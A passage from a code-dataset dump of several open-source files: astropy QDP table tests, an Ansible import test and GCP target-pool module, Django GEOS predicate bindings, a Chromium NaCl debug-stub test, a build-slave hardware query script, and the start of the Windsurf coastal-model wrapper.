53000.123456 2.37847222222222e-05 -2.37847222222222e-05 -0.292553 -0.374935
55045.099887 1.14467592592593e-05 -1.14467592592593e-05 0.000000 -nan
"""
path = str(tmpdir.join('test.qdp'))
with open(path, "w") as fp:
print(example_qdp, file=fp)
table0 = _read_table_qdp(fp.name, names=["MJD", "Rate"], table_id=0)
assert table0.meta["initial_comments"][0].startswith("Swift")
assert table0.meta["comments"][0].startswith("WT -- hard data")
table2 = _read_table_qdp(fp.name, names=["MJD", "Rate"], table_id=2)
assert table2.meta["initial_comments"][0].startswith("Swift")
assert table2.meta["comments"][0].startswith("WT -- hardness")
assert np.isclose(table2["MJD_nerr"][0], -2.37847222222222e-05)
def test_roundtrip(tmpdir):
example_qdp = """
! Swift/XRT hardness ratio of trigger: XXXX, name: BUBU X-2
! Columns are as labelled
READ TERR 1
READ SERR 2
! WT -- hard data
!MJD Err (pos) Err(neg) Rate Error
53000.123456 2.37847222222222e-05 -2.37847222222222e-05 NO 0.212439
55045.099887 1.14467592592593e-05 -1.14467592592593e-05 0.000000 0.000000
NO NO NO NO NO
! WT -- soft data
!MJD Err (pos) Err(neg) Rate Error
53000.123456 2.37847222222222e-05 -2.37847222222222e-05 0.726155 0.583890
55045.099887 1.14467592592593e-05 -1.14467592592593e-05 2.410935 1.393592
NO NO NO NO NO
! WT -- hardness ratio
!MJD Err (pos) Err(neg) Rate Error
53000.123456 2.37847222222222e-05 -2.37847222222222e-05 -0.292553 -0.374935
55045.099887 1.14467592592593e-05 -1.14467592592593e-05 0.000000 NO
! Add command, just to raise the warning.
READ TERR 1
! WT -- whatever
!MJD Err (pos) Err(neg) Rate Error
53000.123456 2.37847222222222e-05 -2.37847222222222e-05 -0.292553 -0.374935
NO 1.14467592592593e-05 -1.14467592592593e-05 0.000000 NO
"""
path = str(tmpdir.join('test.qdp'))
path2 = str(tmpdir.join('test2.qdp'))
with open(path, "w") as fp:
print(example_qdp, file=fp)
with pytest.warns(AstropyUserWarning) as record:
table = _read_table_qdp(path, names=["MJD", "Rate"],
table_id=0)
assert np.any(["This file contains multiple command blocks"
in r.message.args[0]
for r in record])
_write_table_qdp(table, path2)
new_table = _read_table_qdp(path2, names=["MJD", "Rate"], table_id=0)
for col in new_table.colnames:
is_masked = np.array([np.ma.is_masked(val) for val in new_table[col]])
if np.any(is_masked):
# All NaN values are read as such.
assert np.ma.is_masked(table[col][is_masked])
is_nan = np.array([(not np.ma.is_masked(val) and np.isnan(val))
for val in new_table[col]])
# All non-NaN values are the same
assert np.allclose(new_table[col][~is_nan], table[col][~is_nan])
if np.any(is_nan):
# All NaN values are read as such.
assert np.isnan(table[col][is_nan])
assert np.allclose(new_table['MJD_perr'], [2.378472e-05, 1.1446759e-05])
for meta_name in ['initial_comments', 'comments']:
assert meta_name in new_table.meta
def test_read_example(tmpdir):
example_qdp = """
! Initial comment line 1
! Initial comment line 2
READ TERR 1
READ SERR 3
! Table 0 comment
!a a(pos) a(neg) b c ce d
53000.5 0.25 -0.5 1 1.5 3.5 2
54000.5 1.25 -1.5 2 2.5 4.5 3
NO NO NO NO NO
! Table 1 comment
!a a(pos) a(neg) b c ce d
54000.5 2.25 -2.5 NO 3.5 5.5 5
55000.5 3.25 -3.5 4 4.5 6.5 nan
"""
dat = ascii.read(example_qdp, format='qdp', table_id=1,
names=['a', 'b', 'c', 'd'])
t = Table.read(example_qdp, format='ascii.qdp', table_id=1,
names=['a', 'b', 'c', 'd'])
assert np.allclose(t['a'], [54000, 55000])
assert t['c_err'][0] == 5.5
assert np.ma.is_masked(t['b'][0])
assert np.isnan(t['d'][1])
for col1, col2 in zip(t.itercols(), dat.itercols()):
assert np.allclose(col1, col2, equal_nan=True)
def test_roundtrip_example(tmpdir):
example_qdp = """
! Initial comment line 1
! Initial comment line 2
READ TERR 1
READ SERR 3
! Table 0 comment
!a a(pos) a(neg) b c ce d
53000.5 0.25 -0.5 1 1.5 3.5 2
54000.5 1.25 -1.5 2 2.5 4.5 3
NO NO NO NO NO
! Table 1 comment
!a a(pos) a(neg) b c ce d
54000.5 2.25 -2.5 NO 3.5 5.5 5
55000.5 3.25 -3.5 4 4.5 6.5 nan
"""
test_file = str(tmpdir.join('test.qdp'))
t = Table.read(example_qdp, format='ascii.qdp', table_id=1,
names=['a', 'b', 'c', 'd'])
t.write(test_file, err_specs={'terr': [1], 'serr': [3]})
t2 = Table.read(test_file, names=['a', 'b', 'c', 'd'], table_id=0)
for col1, col2 in zip(t.itercols(), t2.itercols()):
assert np.allclose(col1, col2, equal_nan=True)
def test_roundtrip_example_comma(tmpdir):
example_qdp = """
! Initial comment line 1
! Initial comment line 2
READ TERR 1
READ SERR 3
! Table 0 comment
!a,a(pos),a(neg),b,c,ce,d
53000.5,0.25,-0.5,1,1.5,3.5,2
54000.5,1.25,-1.5,2,2.5,4.5,3
NO,NO,NO,NO,NO
! Table 1 comment
!a,a(pos),a(neg),b,c,ce,d
54000.5,2.25,-2.5,NO,3.5,5.5,5
55000.5,3.25,-3.5,4,4.5,6.5,nan
"""
test_file = str(tmpdir.join('test.qdp'))
t = Table.read(example_qdp, format='ascii.qdp', table_id=1,
names=['a', 'b', 'c', 'd'], sep=',')
t.write(test_file, err_specs={'terr': [1], 'serr': [3]})
t2 = Table.read(test_file, names=['a', 'b', 'c', 'd'], table_id=0)
# t.values_equal(t2)
for col1, col2 in zip(t.itercols(), t2.itercols()):
assert np.allclose(col1, col2, equal_nan=True)
def test_read_write_simple(tmpdir):
test_file = str(tmpdir.join('test.qdp'))
t1 = Table()
t1.add_column(Column(name='a', data=[1, 2, 3, 4]))
t1.add_column(MaskedColumn(data=[4., np.nan, 3., 1.], name='b',
mask=[False, False, False, True]))
t1.write(test_file, format='ascii.qdp')
with pytest.warns(UserWarning) as record:
t2 = Table.read(test_file, format='ascii.qdp')
assert np.any(["table_id not specified. Reading the first available table"
in r.message.args[0]
for r in record])
assert np.allclose(t2['col1'], t1['a'])
assert np.all(t2['col1'] == t1['a'])
good = ~np.isnan(t1['b'])
assert np.allclose(t2['col2'][good], t1['b'][good])
def test_read_write_simple_specify_name(tmpdir):
test_file = str(tmpdir.join('test.qdp'))
t1 = Table()
t1.add_column(Column(name='a', data=[1, 2, 3]))
# Give a non-None err_specs
t1.write(test_file, format='ascii.qdp')
t2 = Table.read(test_file, table_id=0, format='ascii.qdp', names=['a'])
assert np.all(t2['a'] == t1['a'])
def test_get_lines_from_qdp(tmpdir):
test_file = str(tmpdir.join('test.qdp'))
text_string = "A\nB"
text_output = _get_lines_from_file(text_string)
with open(test_file, "w") as fobj:
print(text_string, file=fobj)
file_output = _get_lines_from_file(test_file)
list_output = _get_lines_from_file(["A", "B"])
for i, line in enumerate(["A", "B"]):
assert file_output[i] == line
assert list_output[i] == line
assert text_output[i] == line
| bsd-3-clause |
prune998/ansible | test/integration/targets/module_utils/library/test.py | 91 | 2819 | #!/usr/bin/python
results = {}
# Test import with no from
import ansible.module_utils.foo0
results['foo0'] = ansible.module_utils.foo0.data
# Test depthful import with no from
import ansible.module_utils.bar0.foo
results['bar0'] = ansible.module_utils.bar0.foo.data
# Test import of module_utils/foo1.py
from ansible.module_utils import foo1
results['foo1'] = foo1.data
# Test import of an identifier inside of module_utils/foo2.py
from ansible.module_utils.foo2 import data
results['foo2'] = data
# Test import of module_utils/bar1/__init__.py
from ansible.module_utils import bar1
results['bar1'] = bar1.data
# Test import of an identifier inside of module_utils/bar2/__init__.py
from ansible.module_utils.bar2 import data
results['bar2'] = data
# Test import of module_utils/baz1/one.py
from ansible.module_utils.baz1 import one
results['baz1'] = one.data
# Test import of an identifier inside of module_utils/baz2/one.py
from ansible.module_utils.baz2.one import data
results['baz2'] = data
# Test import of module_utils/spam1/ham/eggs/__init__.py
from ansible.module_utils.spam1.ham import eggs
results['spam1'] = eggs.data
# Test import of an identifier inside module_utils/spam2/ham/eggs/__init__.py
from ansible.module_utils.spam2.ham.eggs import data
results['spam2'] = data
# Test import of module_utils/spam3/ham/bacon.py
from ansible.module_utils.spam3.ham import bacon
results['spam3'] = bacon.data
# Test import of an identifier inside of module_utils/spam4/ham/bacon.py
from ansible.module_utils.spam4.ham.bacon import data
results['spam4'] = data
# Test import of module_utils.spam5.ham bacon and eggs (modules)
from ansible.module_utils.spam5.ham import bacon, eggs
results['spam5'] = (bacon.data, eggs.data)
# Test import of module_utils.spam6.ham bacon and eggs (identifiers)
from ansible.module_utils.spam6.ham import bacon, eggs
results['spam6'] = (bacon, eggs)
# Test import of module_utils.spam7.ham bacon and eggs (module and identifier)
from ansible.module_utils.spam7.ham import bacon, eggs
results['spam7'] = (bacon.data, eggs)
# Test import of module_utils/spam8/ham/bacon.py and module_utils/spam8/ham/eggs.py separately
from ansible.module_utils.spam8.ham import bacon
from ansible.module_utils.spam8.ham import eggs
results['spam8'] = (bacon.data, eggs)
# Test that import of module_utils/qux1/quux.py using as works
from ansible.module_utils.qux1 import quux as one
results['qux1'] = one.data
# Test that importing qux2/quux.py and qux2/quuz.py using as works
from ansible.module_utils.qux2 import quux as one, quuz as two
results['qux2'] = (one.data, two.data)
# Test depth
from ansible.module_utils.a.b.c.d.e.f.g.h import data
results['abcdefgh'] = data
from ansible.module_utils.basic import AnsibleModule
AnsibleModule(argument_spec=dict()).exit_json(**results)
| gpl-3.0 |
aperigault/ansible | lib/ansible/modules/cloud/google/gcp_compute_target_pool_info.py | 2 | 8870 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2017 Google
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# ----------------------------------------------------------------------------
#
# *** AUTO GENERATED CODE *** AUTO GENERATED CODE ***
#
# ----------------------------------------------------------------------------
#
# This file is automatically generated by Magic Modules and manual
# changes will be clobbered when the file is regenerated.
#
# Please read more about how to change this file at
# https://www.github.com/GoogleCloudPlatform/magic-modules
#
# ----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function
__metaclass__ = type
################################################################################
# Documentation
################################################################################
ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ["preview"], 'supported_by': 'community'}
DOCUMENTATION = '''
---
module: gcp_compute_target_pool_info
description:
- Gather info for GCP TargetPool
- This module was called C(gcp_compute_target_pool_facts) before Ansible 2.9. The
usage has not changed.
short_description: Gather info for GCP TargetPool
version_added: 2.7
author: Google Inc. (@googlecloudplatform)
requirements:
- python >= 2.6
- requests >= 2.18.4
- google-auth >= 1.3.0
options:
filters:
description:
- A list of filter value pairs. Available filters are listed here U(https://cloud.google.com/sdk/gcloud/reference/topic/filters).
- Each additional filter in the list will act be added as an AND condition (filter1
and filter2) .
type: list
region:
description:
- The region where the target pool resides.
required: true
type: str
extends_documentation_fragment: gcp
'''
EXAMPLES = '''
- name: get info on a target pool
gcp_compute_target_pool_info:
region: us-west1
filters:
- name = test_object
project: test_project
auth_kind: serviceaccount
service_account_file: "/tmp/auth.pem"
'''
RETURN = '''
resources:
description: List of resources
returned: always
type: complex
contains:
backupPool:
description:
- This field is applicable only when the containing target pool is serving a
forwarding rule as the primary pool, and its failoverRatio field is properly
set to a value between [0, 1].
- 'backupPool and failoverRatio together define the fallback behavior of the
primary target pool: if the ratio of the healthy instances in the primary
pool is at or below failoverRatio, traffic arriving at the load-balanced IP
will be directed to the backup pool.'
- In case where failoverRatio and backupPool are not set, or all the instances
in the backup pool are unhealthy, the traffic will be directed back to the
primary pool in the "force" mode, where traffic will be spread to the healthy
instances with the best effort, or to all instances when no instance is healthy.
returned: success
type: dict
creationTimestamp:
description:
- Creation timestamp in RFC3339 text format.
returned: success
type: str
description:
description:
- An optional description of this resource.
returned: success
type: str
failoverRatio:
description:
- This field is applicable only when the containing target pool is serving a
forwarding rule as the primary pool (i.e., not as a backup pool to some other
target pool). The value of the field must be in [0, 1].
- 'If set, backupPool must also be set. They together define the fallback behavior
of the primary target pool: if the ratio of the healthy instances in the primary
pool is at or below this number, traffic arriving at the load-balanced IP
will be directed to the backup pool.'
- In case where failoverRatio is not set or all the instances in the backup
pool are unhealthy, the traffic will be directed back to the primary pool
in the "force" mode, where traffic will be spread to the healthy instances
with the best effort, or to all instances when no instance is healthy.
returned: success
type: str
healthCheck:
description:
- A reference to a HttpHealthCheck resource.
- A member instance in this pool is considered healthy if and only if the health
checks pass. If not specified it means all member instances will be considered
healthy at all times.
returned: success
type: dict
id:
description:
- The unique identifier for the resource.
returned: success
type: int
instances:
description:
- A list of virtual machine instances serving this pool.
- They must live in zones contained in the same region as this pool.
returned: success
type: list
name:
description:
- Name of the resource. Provided by the client when the resource is created.
The name must be 1-63 characters long, and comply with RFC1035. Specifically,
the name must be 1-63 characters long and match the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?`
which means the first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last character,
which cannot be a dash.
returned: success
type: str
sessionAffinity:
description:
- 'Session affinity option. Must be one of these values: - NONE: Connections
from the same client IP may go to any instance in the pool.'
- "- CLIENT_IP: Connections from the same client IP will go to the same instance
in the pool while that instance remains healthy."
- "- CLIENT_IP_PROTO: Connections from the same client IP with the same IP protocol
will go to the same instance in the pool while that instance remains healthy."
returned: success
type: str
region:
description:
- The region where the target pool resides.
returned: success
type: str
'''
################################################################################
# Imports
################################################################################
from ansible.module_utils.gcp_utils import navigate_hash, GcpSession, GcpModule, GcpRequest
import json
################################################################################
# Main
################################################################################
def main():
module = GcpModule(argument_spec=dict(filters=dict(type='list', elements='str'), region=dict(required=True, type='str')))
if module._name == 'gcp_compute_target_pool_facts':
module.deprecate("The 'gcp_compute_target_pool_facts' module has been renamed to 'gcp_compute_target_pool_info'", version='2.13')
if not module.params['scopes']:
module.params['scopes'] = ['https://www.googleapis.com/auth/compute']
items = fetch_list(module, collection(module), query_options(module.params['filters']))
if items.get('items'):
items = items.get('items')
else:
items = []
return_value = {'resources': items}
module.exit_json(**return_value)
def collection(module):
return "https://www.googleapis.com/compute/v1/projects/{project}/regions/{region}/targetPools".format(**module.params)
def fetch_list(module, link, query):
auth = GcpSession(module, 'compute')
response = auth.get(link, params={'filter': query})
return return_if_object(module, response)
def query_options(filters):
if not filters:
return ''
if len(filters) == 1:
return filters[0]
else:
queries = []
for f in filters:
# For multiple queries, all queries should have ()
if f[0] != '(' and f[-1] != ')':
queries.append("(%s)" % ''.join(f))
else:
queries.append(f)
return ' '.join(queries)
def return_if_object(module, response):
# If not found, return nothing.
if response.status_code == 404:
return None
# If no content, return nothing.
if response.status_code == 204:
return None
try:
module.raise_for_status(response)
result = response.json()
except getattr(json.decoder, 'JSONDecodeError', ValueError) as inst:
module.fail_json(msg="Invalid JSON response with error: %s" % inst)
if navigate_hash(result, ['error', 'errors']):
module.fail_json(msg=navigate_hash(result, ['error', 'errors']))
return result
if __name__ == "__main__":
main()
| gpl-3.0 |
alphafoobar/intellij-community | python/lib/Lib/site-packages/django/contrib/gis/geos/prototypes/predicates.py | 623 | 1777 | """
This module houses the GEOS ctypes prototype functions for the
unary and binary predicate operations on geometries.
"""
from ctypes import c_char, c_char_p, c_double
from django.contrib.gis.geos.libgeos import GEOM_PTR
from django.contrib.gis.geos.prototypes.errcheck import check_predicate
from django.contrib.gis.geos.prototypes.threadsafe import GEOSFunc
## Binary & unary predicate functions ##
def binary_predicate(func, *args):
"For GEOS binary predicate functions."
argtypes = [GEOM_PTR, GEOM_PTR]
if args: argtypes += args
func.argtypes = argtypes
func.restype = c_char
func.errcheck = check_predicate
return func
def unary_predicate(func):
"For GEOS unary predicate functions."
func.argtypes = [GEOM_PTR]
func.restype = c_char
func.errcheck = check_predicate
return func
## Unary Predicates ##
geos_hasz = unary_predicate(GEOSFunc('GEOSHasZ'))
geos_isempty = unary_predicate(GEOSFunc('GEOSisEmpty'))
geos_isring = unary_predicate(GEOSFunc('GEOSisRing'))
geos_issimple = unary_predicate(GEOSFunc('GEOSisSimple'))
geos_isvalid = unary_predicate(GEOSFunc('GEOSisValid'))
## Binary Predicates ##
geos_contains = binary_predicate(GEOSFunc('GEOSContains'))
geos_crosses = binary_predicate(GEOSFunc('GEOSCrosses'))
geos_disjoint = binary_predicate(GEOSFunc('GEOSDisjoint'))
geos_equals = binary_predicate(GEOSFunc('GEOSEquals'))
geos_equalsexact = binary_predicate(GEOSFunc('GEOSEqualsExact'), c_double)
geos_intersects = binary_predicate(GEOSFunc('GEOSIntersects'))
geos_overlaps = binary_predicate(GEOSFunc('GEOSOverlaps'))
geos_relatepattern = binary_predicate(GEOSFunc('GEOSRelatePattern'), c_char_p)
geos_touches = binary_predicate(GEOSFunc('GEOSTouches'))
geos_within = binary_predicate(GEOSFunc('GEOSWithin'))
| apache-2.0 |
ltilve/chromium | chrome/test/data/nacl/debug_stub_browser_tests.py | 97 | 3312 | # Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import re
import sys
import xml.etree.ElementTree
import gdb_rsp
def GetTargetArch(connection):
"""Get the CPU architecture of the NaCl application."""
reply = connection.RspRequest('qXfer:features:read:target.xml:0,fff')
assert reply[0] == 'l', reply
tree = xml.etree.ElementTree.fromstring(reply[1:])
arch_tag = tree.find('architecture')
assert arch_tag is not None, reply
return arch_tag.text.strip()
def ReverseBytes(byte_string):
"""Reverse bytes in the hex string: '09ab' -> 'ab09'. This converts
little-endian number in the hex string to its normal string representation.
"""
assert len(byte_string) % 2 == 0, byte_string
return ''.join([byte_string[i - 2 : i]
for i in xrange(len(byte_string), 0, -2)])
def GetProgCtrString(connection, arch):
"""Get current execution point."""
registers = connection.RspRequest('g')
# PC register indices can be found in
# native_client/src/trusted/debug_stub/abi.cc in AbiInit function.
if arch == 'i386':
# eip index is 8
return ReverseBytes(registers[8 * 8 : 8 * 8 + 8])
if arch == 'i386:x86-64':
# rip index is 16
return ReverseBytes(registers[16 * 16 : 16 * 16 + 8])
if arch == 'iwmmxt':
# pc index is 15
return ReverseBytes(registers[15 * 8 : 15 * 8 + 8])
raise AssertionError('Unknown architecture: %s' % arch)
def TestContinue(connection):
result = connection.RspRequest('vCont;c')
# Once the NaCl test module reports that the test passed, the NaCl <embed>
# element is removed from the page and so the NaCl module is killed by
# the browser what is reported as exit due to SIGKILL (X09).
assert result == 'X09', result
def TestBreakpoint(connection):
# Breakpoints and single-stepping might interfere with Chrome sandbox. So we
# check that they work properly in this test.
arch = GetTargetArch(connection)
registers = connection.RspRequest('g')
pc = GetProgCtrString(connection, arch)
# Set breakpoint
result = connection.RspRequest('Z0,%s,1' % pc)
assert result == 'OK', result
# Check that we stopped at breakpoint
result = connection.RspRequest('vCont;c')
stop_reply = re.compile(r'T05thread:(\d+);')
assert stop_reply.match(result), result
thread = stop_reply.match(result).group(1)
# Check that registers haven't changed
result = connection.RspRequest('g')
assert result == registers, (result, registers)
# Remove breakpoint
result = connection.RspRequest('z0,%s,1' % pc)
assert result == 'OK', result
# Check single stepping
result = connection.RspRequest('vCont;s:%s' % thread)
assert result == 'T05thread:%s;' % thread, result
assert pc != GetProgCtrString(connection, arch)
# Check that we terminate normally
result = connection.RspRequest('vCont;c')
assert result == 'X09', result
def Main(args):
port = int(args[0])
name = args[1]
connection = gdb_rsp.GdbRspConnection(('localhost', port))
if name == 'continue':
TestContinue(connection)
elif name == 'breakpoint':
TestBreakpoint(connection)
else:
raise AssertionError('Unknown test name: %r' % name)
if __name__ == '__main__':
Main(sys.argv[1:])
| bsd-3-clause |
benschmaus/catapult | common/lab/hardware.py | 11 | 2477 | #!/usr/bin/env python
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Query build slave hardware info, and print it to stdout as csv."""
import csv
import json
import logging
import sys
import urllib2
_MASTERS = [
'chromium.perf',
'chromium.perf.fyi',
'client.catapult',
'tryserver.chromium.perf',
'tryserver.client.catapult',
]
_KEYS = [
'master', 'builder', 'hostname',
'os family', 'os version', 'bitness (userland)',
'product name', 'architecture', 'processor count', 'processor type',
'memory total',
'facter version', 'git version', 'puppet version', 'python version',
'ruby version',
'android device 1', 'android device 2', 'android device 3',
'android device 4', 'android device 5', 'android device 6',
'android device 7', 'android device 8',
]
_EXCLUDED_KEYS = frozenset([
'architecture (userland)',
'b directory',
'last puppet run',
'uptime',
'windows version',
])
def main():
writer = csv.DictWriter(sys.stdout, _KEYS)
writer.writeheader()
for master_name in _MASTERS:
master_data = json.load(urllib2.urlopen(
'http://build.chromium.org/p/%s/json/slaves' % master_name))
slaves = sorted(master_data.iteritems(),
key=lambda x: (x[1]['builders'].keys(), x[0]))
for slave_name, slave_data in slaves:
for builder_name in slave_data['builders']:
row = {
'master': master_name,
'builder': builder_name,
'hostname': slave_name,
}
host_data = slave_data['host']
if host_data:
host_data = host_data.splitlines()
if len(host_data) > 1:
for line in host_data:
if not line:
continue
key, value = line.split(': ')
if key in _EXCLUDED_KEYS:
continue
row[key] = value
# Munge keys.
row = {key.replace('_', ' '): value for key, value in row.iteritems()}
if 'osfamily' in row:
row['os family'] = row.pop('osfamily')
if 'product name' not in row and slave_name.startswith('slave'):
row['product name'] = 'Google Compute Engine'
try:
writer.writerow(row)
except ValueError:
logging.error(row)
raise
if __name__ == '__main__':
main()
| bsd-3-clause |
openearth/windsurf | windsurf/model.py | 1 | 27033 | import os
import re
import imp
import time
import json
import shutil
import logging
import traceback
import importlib
import numpy as np
import cPickle as pickle
from bmi.api import IBmi
from bmi.wrapper import BMIWrapper
from multiprocessing import Process
import netcdf, parsers
# initialize log
logger = logging.getLogger(__name__)
class WindsurfWrapper:
'''Windsurf class
Main class for Windsurf model. Windsurf is a composite model for
simulating integrated nearshore and aeolian sediment transport.
'''
regime = None
def __init__(self, configfile=None, restartfile=None):
'''Initialize the class
Parameters
----------
configfile : str
path to JSON configuration file, see
:func:`~windsurf.model.Windsurf.load_configfile`
restartfile : str
path to Pickle restart file
'''
self.configfile = configfile
self.restartfile = restartfile
self.restart = restartfile is not None
def run(self, callback=None, subprocess=True):
'''Spawn model time loop'''
if subprocess:
p = Process(target=self.start,
args=(callback,))
p.start()
p.join()
else:
self.start(callback)
def start(self, callback=None):
'''Start model time loop'''
# parse callback
callback = self.parse_callback(callback)
self.engine = Windsurf(configfile=self.configfile)
self.engine.initialize()
self.t = 0
self.i = 0
self.iout = 0
self.tlog = 0.0 # in real-world time
self.tlast = 0.0 # in simulation time
self.tstart = time.time() # in real-world time
self.tstop = self.engine.get_end_time() # in simulation time
self.output_init()
if self.restart:
self.load_restart_file()
else:
self.output()
while self.t < self.tstop:
if callback is not None:
callback(self.engine)
self.set_regime()
self.engine.update()
self.t = self.engine.get_current_time()
self.i += 1
self.output()
self.progress()
self.tlast = self.t
self.engine.finalize()
logger.debug('End of simulation')
def set_regime(self):
'''Set model settings according to current regime
Checks which regime should be currently active. If the regime
is changed, the corresponding model parameters are set.
'''
regimes = self.engine.get_config_value('regimes')
scenario = self.engine.get_config_value('scenario')
times = np.asarray([s[0] for s in scenario])
idx = np.where(times <= self.t)[0].max()
if idx >= len(scenario):
logger.warning("Scenario too short, reusing last regime!")
idx = len(scenario)-1
if scenario[idx][1] != self.regime:
self.regime = scenario[idx][1]
logger.info('Switched to regime "%s"' % self.regime)
for engine, variables in regimes[self.regime].iteritems():
for name, value in variables.iteritems():
logger.debug('Set parameter "%s" in engine "%s" to "%s"' % (name,
engine,
value))
self.engine.set_var('%s.%s' % (engine, name), np.asarray(value))
def parse_callback(self, callback):
'''Parses callback definition and returns function
The callback function can be specified in two formats:
- As a native Python function
- As a string refering to a Python script and function,
separated by a colon (e.g. ``example/callback.py:function``)
Parameters
----------
callback : str or function
Callback definition
Returns
-------
function
Python callback function
'''
if isinstance(callback, str):
if ':' in callback:
fname, func = callback.split(':')
if os.path.exists(fname):
mod = imp.load_source('callback', fname)
if hasattr(mod, func):
return getattr(mod, func)
elif hasattr(callback, '__call__'):
return callback
elif callback is None:
return callback
logger.warn('Invalid callback definition [%s]' % callback)
return None
def output_init(self):
'''Initialize netCDF4 output file
Creates an empty netCDF4 output file with the necessary
dimensions, variables, attributes and coordinate reference
system specification (crs).
'''
outputfile = self.engine.get_config_value('netcdf', 'outputfile')
outputvars = self.engine.get_config_value('netcdf', 'outputvars')
attributes = self.engine.get_config_value('netcdf', 'attributes')
crs = self.engine.get_config_value('netcdf', 'crs')
if outputfile is not None and outputvars is not None:
if not self.restart or not os.path.exists(outputfile):
logger.debug('Initializing output...')
# get dimension names for each variable
variables = {
v : { 'dimensions' : self.engine.get_dimensions(v) }
for v in outputvars
}
for v in variables.iterkeys():
logger.info('Creating netCDF output for "%s"' % v)
netcdf.initialize(outputfile,
self.read_dimensions(),
variables=variables,
attributes=attributes,
crs=crs)
def output(self):
'''Write model data to netCDF4 output file'''
# dump restart and/or backup file if requested
times = self.engine.get_config_value('restart', 'times')
if times is not None:
tr = np.asarray(times)
if self.tlast > 0. and np.any((tr <= self.t) & (tr > self.tlast)):
self.dump_restart_file()
if self.engine.get_config_value('restart', 'backup'):
self.create_backup()
# write output if requested
if np.mod(self.t, self.engine.tout) < self.t - self.tlast:
outputfile = self.engine.get_config_value('netcdf', 'outputfile')
outputvars = self.engine.get_config_value('netcdf', 'outputvars')
if outputfile is not None and outputvars is not None:
logger.debug('Writing output at t=%0.2f...' % self.t)
# get dimension data for each variable
variables = {v : self.engine.get_var(v) for v in outputvars}
variables['time'] = self.t
netcdf.append(outputfile,
idx=self.iout,
variables=variables)
self.iout += 1
def load_restart_file(self):
'''Load restart file from previous run'''
if os.path.exists(self.restartfile):
with open(self.restartfile, 'r') as fp:
dump = pickle.load(fp)
self.engine.update(-dump['time'])
self.t = self.engine.get_current_time()
self.tlast = self.t
self.iout = dump['iout']
self.i = dump['i']
for engine, variables in dump['data'].iteritems():
for var, val in variables.iteritems():
self.engine.set_var('%s.%s' % (engine, var), val)
logger.info('Loaded restart file "%s".' % self.restartfile)
else:
logger.error('Restart file "%s" not found' % self.restartfile)
def dump_restart_file(self):
'''Dump restart file to start next run'''
fname = 'restart.%d.pkl' % self.t
if not os.path.exists(fname):
variables = self.engine.get_config_value('restart', 'variables')
if variables is not None:
dump = {
'time' : self.t,
'iout' : self.iout,
'i' : self.i,
'data' : {}
}
for model in self.engine.models.iterkeys():
dump['data'][model] = {}
for var in variables:
val = self.engine.get_var(var)
engine, var = self.engine._split_var(var)
dump['data'][engine][var] = val
with open(fname, 'w') as fp:
pickle.dump(dump, fp)
logger.info('Written restart file "%s".' % fname)
def create_backup(self):
'''Create backup file of output file'''
logger.info('Creating backup file...')
outputfile = self.engine.get_config_value('netcdf', 'outputfile')
if outputfile is not None:
shutil.copyfile(outputfile, '%s~' % outputfile)
def read_dimensions(self):
'''Read dimensions of composite domain
Parses individual model engine configuration files and read
information regarding the dimensions of the composite domain,
like the bathymetric grid, number of sediment fractions and
number of bed layers.
Returns
-------
dict
dictionary with dimension variables
'''
dimensions = {}
if self.engine.models.has_key('xbeach'):
cfg_xbeach = parsers.XBeachParser(
self.engine.models['xbeach']['configfile']).parse()
else:
cfg_xbeach = {}
if self.engine.models.has_key('aeolis'):
cfg_aeolis = parsers.AeolisParser(
self.engine.models['aeolis']['configfile']).parse()
else:
cfg_aeolis = {}
# x and y
if len(cfg_xbeach) > 0:
dimensions['x'] = cfg_xbeach['xfile'].reshape(
(cfg_xbeach['ny']+1,
cfg_xbeach['nx']+1))[0,:]
dimensions['y'] = cfg_xbeach['yfile'].reshape(
(cfg_xbeach['ny']+1,
cfg_xbeach['nx']+1))[:,0]
elif len(cfg_aeolis) > 0:
dimensions['x'] = cfg_aeolis['xgrid_file'].reshape(
(cfg_aeolis['ny']+1,
cfg_aeolis['nx']+1))[0,:]
dimensions['y'] = cfg_aeolis['ygrid_file'].reshape(
(cfg_aeolis['ny']+1,
cfg_aeolis['nx']+1))[:,0]
else:
dimensions['x'] = []
dimensions['y'] = []
# layers and fractions
if len(cfg_aeolis) > 0:
dimensions['layers'] = np.arange(cfg_aeolis['nlayers']) * \
cfg_aeolis['layer_thickness']
dimensions['fractions'] = cfg_aeolis['grain_size'][:cfg_aeolis['nfractions']]
else:
dimensions['layers'] = []
dimensions['fractions'] = []
# ensure lists
for k, v in dimensions.iteritems():
try:
len(v)
except:
dimensions[k] = [v]
return dimensions
def progress(self, frac=.1):
'''Log progress
Parameters
----------
frac : float
log interval as fraction of simulation time
'''
if (np.mod(self.t, self.tstop * frac) < self.t - self.tlast or \
time.time() - self.tlog > 60.):
p = min(1, self.t / self.tstop)
dt1 = time.time() - self.tstart
dt2 = dt1 / p
dt3 = dt2 * (1-p)
fmt = '[%5.1f%%] %s / %s / %s (avg. dt=%5.3f)'
if p <= 1:
logger.info(fmt % (p*100.,
time.strftime('%H:%M:%S', time.gmtime(dt1)),
time.strftime('%H:%M:%S', time.gmtime(dt2)),
time.strftime('%H:%M:%S', time.gmtime(dt3)),
self.t / self.i))
self.tlog = time.time()
class Windsurf(IBmi):
'''Windsurf BMI class
BMI compatible class for calling the Windsurf composite model.
'''
t = 0.0
def __init__(self, configfile=None):
'''Initialize the class
Parameters
----------
configfile : str
path to JSON configuration file, see
:func:`~windsurf.model.Windsurf.load_configfile`
'''
self.configfile = configfile
self.load_configfile()
def __enter__(self):
'''Enter the class'''
self.initialize()
return self
def __exit__(self, errtype, errobj, traceback):
'''Exit the class
Parameters
----------
errtype : type
type representation of exception class
errobj : Exception
exception object
traceback : traceback
traceback stack
'''
self.finalize()
if errobj:
raise errobj
def load_configfile(self):
'''Load configuration file
A JSON configuration file may contain the following:
.. literalinclude:: ../example/windsurf.json
:language: json
See for more information section :ref:`configuration`.
'''
if os.path.exists(self.configfile):
# store current working directory
self.cwd = os.getcwd()
